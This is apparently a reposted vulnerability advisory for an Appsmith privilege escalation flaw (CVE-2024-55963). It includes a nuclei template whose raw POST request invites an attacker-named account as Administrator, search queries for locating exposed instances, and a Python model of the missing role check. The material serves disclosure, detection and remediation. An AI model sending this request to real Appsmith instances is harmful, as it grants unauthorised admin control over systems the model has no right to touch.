Appsmith Privilege Escalation Vulnerability

Vulnerability Information

Vulnerability name: Appsmith Privilege Escalation Vulnerability

Vulnerability IDs:

  • CVE: CVE-2024-55963

Vulnerability type: Privilege escalation

Severity: High

Vulnerability description: Appsmith is an open-source low-code platform for building internal tools and applications. It is widely used in enterprise services, supports rapid development and deployment, and its ease of use and flexibility have made it popular with developers. The vulnerability lies in Appsmith's /api/v1/users/invite endpoint, which allows an authenticated user to invite a user as an Administrator, resulting in privilege escalation. The root cause is a defect in the access control mechanism that lets an attacker bypass the normal permission check. Because the flaw allows an ordinary user's privileges to be raised to the Administrator level, giving full control over the Appsmith instance, the potential security risk is very high: an attacker could use it for remote code execution, data exfiltration, or service disruption. Note that exploitation requires the attacker to already hold authenticated access, but once it succeeds, the scope of impact and the degree of control expand substantially.

Vendor: appsmith

Product: appsmith

Affected versions: version < 1.51.0

Search syntax: title="appsmith"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/1ac0fbef4db15fd23fe9f248fa756b42bf2e774f/http%2Fcves%2F2024%2FCVE-2024-55963.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


id: CVE-2024-55963

info:
  name: Appsmith - Privilege Escalation
  author: saikir4n
  severity: high
  description: Appsmith contains a privilege escalation vulnerability via the /api/v1/users/invite endpoint that allows an authenticated user to invite a user as Administrator, indicating broken access control.
  impact: |
    An authenticated attacker can escalate privileges to Administrator level, gaining full control over the Appsmith instance.
  remediation: |
    Update Appsmith to version 1.51.0 or later to fix this privilege escalation vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-55963
    - https://github.com/appsmithorg/appsmith/security/advisories/GHSA-jxh3-4vp2-vhjx
    - https://rhinosecuritylabs.com/research/cve-2024-55963-appsmith-rce/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-55963
    cwe-id: CWE-269
  metadata:
    verified: true
    max-request: 1
    vendor: appsmith
    product: appsmith
    shodan-query: http.title:"appsmith"
    fofa-query: title="appsmith"
  tags: cve,cve2024,appsmith,privilege-escalation

http:
  - raw:
      - |
        POST /api/v1/users/invite HTTP/1.1
        Host: {{Hostname}}
        Origin: http://{{Hostname}}
        Referer: http://{{Hostname}}/applications
        Content-Type: application/json
        X-XSRF-TOKEN: {{xsrf_token}}
        Cookie: XSRF-TOKEN={{xsrf_token}}; SESSION={{session_id}}

        {
          "email": "admin-evil@evil.com",
          "usernames": ["admin-evil"],
          "roleNames": ["Administrator"]
        }

    attack: pitchfork
    payloads:
      xsrf_token:
        - REPLACE_XSRF_TOKEN
      session_id:
        - REPLACE_SESSION_ID

    matchers:
      - type: word
        part: body
        words:
          - "You have been invited to join Appsmith"
          - "inviteToken"

      - type: status
        status:
          - 200
          - 201

    matchers-condition: and
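The template above only confirms that the check is missing. As an added illustration, not Appsmith's own code (which is Java), the following Python models the server-side authorization an invite endpoint needs: the inviter must be permitted to grant every role it requests, so being authenticated is not enough. The request body is the one from the template; the role names other than Administrator and the granting rules in GRANTABLE are assumptions made for the model.

```python
import json

# Request body taken from the nuclei template above, used here as sample input.
INVITE_BODY = json.loads('''{
  "email": "admin-evil@evil.com",
  "usernames": ["admin-evil"],
  "roleNames": ["Administrator"]
}''')

# Assumed role model (not taken from Appsmith's source): key is the inviter's
# role, value is the set of roles that inviter may hand out. Only an
# Administrator may grant Administrator.
GRANTABLE = {
    "Administrator": {"Administrator", "Developer", "App Viewer"},
    "Developer": {"Developer", "App Viewer"},
    "App Viewer": set(),
}


def decide_invite(inviter_role: str, body: dict) -> tuple[str, list[str]]:
    """Return ("allow", []) or ("deny", [roles the inviter may not grant]).

    This is the check whose absence the advisory describes: the decision
    depends on the inviter's own role, not merely on having a session.
    Unknown or missing roles are denied rather than silently ignored.
    """
    requested = body.get("roleNames") or []
    if not isinstance(requested, list) or not requested:
        return "deny", ["<no roleNames>"]
    allowed = GRANTABLE.get(inviter_role, set())
    blocked = sorted(r for r in requested if r not in allowed)
    return ("deny", blocked) if blocked else ("allow", [])


def audit_invites(records: list[dict]) -> list[dict]:
    """Replay recorded invite requests through the hardened check and return
    those it would have rejected, i.e. candidates for review on a patched or
    unpatched instance. Records are constructed for this example."""
    return [r for r in records if decide_invite(r["inviter_role"], r["body"])[0] == "deny"]


if __name__ == "__main__":
    records = [  # constructed: an ordinary user and an admin sending the same body
        {"inviter": "viewer@corp.example", "inviter_role": "App Viewer", "body": INVITE_BODY},
        {"inviter": "root@corp.example", "inviter_role": "Administrator", "body": INVITE_BODY},
    ]
    for r in audit_invites(records):
        print(r["inviter"], "->", decide_invite(r["inviter_role"], r["body"]))
```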



http://example.com/2025/07/22/github_4157044309/
Author: lianccc
Published: July 22, 2025